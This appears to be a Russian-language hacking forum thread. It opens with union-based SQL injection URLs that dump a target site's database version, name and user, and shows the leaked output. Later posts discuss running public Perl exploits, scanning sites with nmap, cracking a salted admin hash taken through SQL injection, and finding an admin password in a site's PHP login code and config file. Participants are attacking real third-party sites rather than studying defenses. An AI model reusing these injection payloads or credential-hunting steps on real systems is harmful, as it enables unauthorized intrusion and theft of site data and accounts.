Code: http://site.ru//tv/?prn&ch=1&rubrics[]=1)+order+by+1--+ http://site.ru/tv/?prn&ch=1&rubrics[]=-1)+union+select+1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,10,11--+ 5.0.22-log:xmlvlru:[email protected]:redhat-linux-gnu
народ вот есть много эксплойтов под разны уязвимости... в общем в чем вопрос: я когда сохраняю сплойт например на перл абсолютно не изменяя его ввожу в cmd cd C:\perl\bin perl sploit.pl нажимаю enter вроде должен запуститься но пишет ошибку синтаксиса, хз почему, в чем может быть проблема , и так со всеми сплойтами абсолютно, переустановка компилятора не помогла
neverdie Это происходит потому, что в сплоитах с паблика очень часто НАМЕРЕННО сделаны ошибки, обычно мелкие синтаксические, для того, что-бы откровенные нубы не могли им воспользоваться. Т.е: ищи ошибку , исправляй и юзай PS Только не нужно сюда копипастить сплоит с просьбой найти ошибку, их не для этого там делают
хм, ну php я более менее шарю а вот перл хз, ну ошибки это подло )))) а как их находить-то если не оч разбираешься в синтаксисе это ж не html редактировать)
короче не обессудьте, вопрос в форум о хешах не пишу, потому как молчат там все насколько я знаю, у mysql5 длина 40 байтов . а какая длина у mysql ? спрашиваю потому что хеши которые я выдрал из 4 версии имеют длину 40 и второй вопрос . есть сайт . сканирую nmap-ом, диапазон портов не задаю, т.е. должно использоваться сканир. стандартн. портов . но сканер выдает бесконечный ряд всевозможных открытых портов, среди них есть и 2, 3, 4 , 5 - значные, короче любые . и главное , скан не заканчивается . как мне нормально отсканировать сайт ? может в опциях указать что-нибудь
Здравствуйте , приятного времени суток Достал пароль от accaunt'a (Sql-inje.. ) а он с salt. Подскажите , где можно найти сам код salt'a , на сайте,в каких таблицах или kak он выглядит... слышал что такое возможно )
пароль от сайта пробовал через этот сайт: https://hashcracking.info/index.php никаких результатов , поэтому и подумал что он с salt. 04b1abea6597fe097c29ca3aebd16584 Но проста , даже на будущее, kak узнать что это salt, где он может быть ,если это сайт или Форум.
Опции, с которыми ты запускаешь nmap можешь показать? Здесь можно почитать про nmap, про типы сканировани и про возможные ситуации.
У меня такой вопрос где может прятатся пароль от админик сайта, парол который есть в базе даных не подходит! админка писалась вручную есть исходник login.php <? include './../cfg.php'; include './../lib/macros.class.php'; include './../lib/mail.class.php'; $sql = "SELECT * FROM ".PREF."admin"; ($result = mysql_query($sql)) or die ($sql . ' : ' . mysql_error()); $f = mysql_fetch_array($result); $login = $f['login']; $pwd = $f['pwd']; $email = $f['mail']; $message = ''; if(isset($_GET['action']) && $_GET['action'] == 'lost_pwd'){ $mail = new mime_mail; $mail -> from = $_SERVER['HTTP_HOST']; $mail -> to = $email; $mail -> subject = "Забыли пароль"; $mail -> body = "Логин :$login\n". "Пароль:$pwd\n"; // $mail -> print_message("text/plain"); $mail -> send("text/plain"); $message = "<b>Пароль и логин отправлены на Ваш EMail.</b>"; } function set_values($login="", $password="", $url="") { session_start(); global $HTTP_SESSION_VARS; $HTTP_SESSION_VARS['login_admin'] = $login; $HTTP_SESSION_VARS['password_admin'] = $password; if ($url) { header("Location: $url"); exit; } } if (isset($_POST['login_admin']) && isset($_POST['password_admin'])) { if ($_POST['login_admin']==$login && $_POST['password_admin']==$pwd) { set_values($_POST['login_admin'], $_POST['password_admin'], "index.php"); } else { set_values(); $a = new Macros; $a -> assign(array( 'MESSAGE' => $message )); $a->define("templates/login.htm"); $a->parse(0); print $a->fetch(); exit; } } session_start(); if (isset($HTTP_SESSION_VARS['login_admin']) && isset($HTTP_SESSION_VARS['password_admin'])) { if ($HTTP_SESSION_VARS['login_admin'] != $login && $HTTP_SESSION_VARS['password_admin']!=$pwd){ set_values(); $a = new Macros; $a -> assign(array( 'MESSAGE' => $message )); $a->define("templates/login.htm"); $a->parse(0); print $a->fetch(); exit; } } else { set_values(); $a = new Macros; $a -> assign(array( 'MESSAGE' => $message )); $a->define("templates/login.htm"); $a->parse(0); print $a->fetch(); exit; } ?>
include './../cfg.php'; перейди на папку выше, там будет cfg.php, в нем возможно upd. ой ступил, ему не это надо=(
Code: $sql = "SELECT * FROM ".PREF."admin"; ($result = mysql_query($sql)) or die ($sql . ' : ' . mysql_error()); $f = mysql_fetch_array($result); $login = $f['login']; $pwd = $f['pwd']; вот тут (может ты не из той таблицы тянешь пасс ы?) префикс таблицы скорее всего тут include './../cfg.php';
Там будет конфиг подключения к базе лежать... Что разве не видишь запрос? Code: $sql = "SELECT * FROM ".PREF."admin"; Тут пароль полюбому..и больше никак..